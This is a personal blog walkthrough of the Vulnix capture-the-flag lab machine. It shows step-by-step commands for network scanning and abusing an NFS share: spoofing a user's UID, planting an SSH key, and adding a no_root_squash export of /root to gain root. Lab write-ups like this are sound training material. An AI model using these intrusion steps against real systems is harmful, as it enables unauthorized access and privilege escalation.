Vulnix walkthrough which bolstered my RHCSA knowledge

Hello everyone,

I hope you all are doing well. Today, I am going to do a a machine to enhance my penetration testing skills and guess what, the machine did test my knowledge on RHCSA (RHEL8). The machine was easy but you can’t say it is easy until you have certain knowledge on NFS share (Network File System Share). I was like “finally the training I attended in Bangalore come to use now lol”.

The machine name is called vulnix and you can easily get it from vulhub website. When I nmap (scan) the box, a huge list of running services were revealed and of course, you can enumerate each and every services (one by one), and that is actually a recommended way to learn or it is a way to get a better insight on the machine. This is actually I believe is how a professional pentester should approach to a machine. However, what I did was simply break the services into different categories and enumerate all the familiar services first.

Ok, let’s do the box.

As always my host Machine IP address is 192.168.56.1

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

Target Machine IP: 192.168.56.13

nmap -sC -sV -p- 192.168.56.13 -oN nmap.log 

-sC running default nmap default script 
-sV enumerating services and version of services 
-p- It represent to check all the 65535 ports 
-oN output

I did an extra step here, however it is not necessary for you. I just did this to show the readers that  nfs version 2 to 4 is running. Therefore, we can exploit either 2 or 3. 4 is comparatively secure.

To get a peek, you can do the following command to know which folder is mounting.

To know a little about NFS: 

click here and here. 

showmount -e 192.168.56.13
sudo mount -o vers=3 192.168.56.13:/home/vulnix mnt

 

 

based on the output, we can be certain that there is a user named vulnix (/home/vulnix).  Now, what we need to do is create this user with UID 2008.

sudo useradd --uid 2008 vulnix

sudo usermod -aG sudo vulnix

su vulnix 

cd /mnt 

mkdir .ssh 

ssh-keygen 
     
          ./id_rsa     (which means I would like have my keys saved in the current directory or /home/vulnix/mnt/.ssh, which is not the default path)

I divide the pane so that you can have the view of the both users (researcher and vulnix)

Since from nmap result, we know that the machine is running with SSH. Therefore and we can try to login to the remote machine with the  SSH key which we generated previously on the target machine through nfs share.

To know little more of SSH and configuration, click here.

cat id_rsa.pub > authorized_keys

ssh -i id_rsa vulnix@192.168.56.13

sudo -l

sudoedit /etc/exports

add 

 /root *(rw,no_root_squash)

No Root Squash (link)

There are many options for NFS and I want to keep this article short but effective so I am leaving out many of the various configuration items that you could do. However there is one option that is worth mentioning, no_root_squash. By default NFS will downgrade any files created with the root permissions to the nobody user. This is a security feature that prevents privileges from being shared unless specifically requested.

If I create a file as the root user on the client on the NFS share, by default that file is owned by the nobody user.

 root@client:~# touch /shared/nfs1/file2 
 root@server:/nfs# ls -la file2
  -rw-r--r-- 1 nobody nogroup 0 Nov 18 18:06 file2

Sometimes it is important to share files that are owned as root with the proper permissions, in these cases this can be done by simply adding the no_root_squash attribute to the /etc/exports configuration.

Adding no_root_squash

Edit the /etc/exports file:

 root@server:/nfs# vi /etc/exports

Modify the /nfs line to:

 /nfs 192.168.0.195/32(rw,sync,no_root_squash)

In our case:

/root *(rw,no_root_squash)     * represents all

Now, let’s reboot our vm to get those changes to the Target Machine.

sudo mount -o vers=3 192.168.56.13:/root mnt

Now, we will use the previous concept that, we will generate a SSH key and try to login with it to get the root access.

sudo -i  

cd /home/researcher/vulhub/vulnix/mnt 

cat trophy.txt

This flag looks weird though lol..

That’s it.. Later if I get time, I will populate this post with other enumerations as well (full of rabbit holes but good to look into)..

it’s 23:58 and perfect time to all it a day 🙂

 

,

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed

Menu